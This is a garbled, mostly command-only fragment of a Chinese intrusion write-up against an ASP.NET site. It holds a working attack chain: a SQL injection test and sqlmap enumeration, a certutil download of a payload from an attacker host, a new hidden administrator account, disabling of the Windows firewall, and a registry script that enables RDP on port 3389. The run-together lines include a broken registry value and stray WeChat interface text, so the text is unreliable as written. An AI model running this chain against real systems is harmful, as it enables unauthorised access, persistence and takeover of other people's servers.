文章来源: HACK学习呀
http://url/newdetail.aspx?id=11999' or 1=1 --python sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbspython sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users
nt authority system 是内置的系统管理账户chdirDir c:\python -m SimpleHTTPServer 80
ping wt070h.dnslog.cncertutil.exe -urlcache -split -f http://funny_ip/amazing1x
#新建用户net user amazingadmin123 amazing.123456 /add#赋予权限net localgroup Administrators amazingadmin123 /add#激活用户net user amazingadmin123 /active:yes#关闭防火墙netsh firewall set opmode mode=disable#开启默认设置 netsh firewall reset
echo Windows Registry Editor Version 5.00 >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.regecho "fDenyTSConnections"=dword:00000000 >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.regecho "ortNumber"=dword:00000D3D >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.regecho "PortNumber"=dword:00000D3D >>3389.regregedit /s 3389.reg
点到即止!
Go to "Discover" > "Top Stories" > "Wow"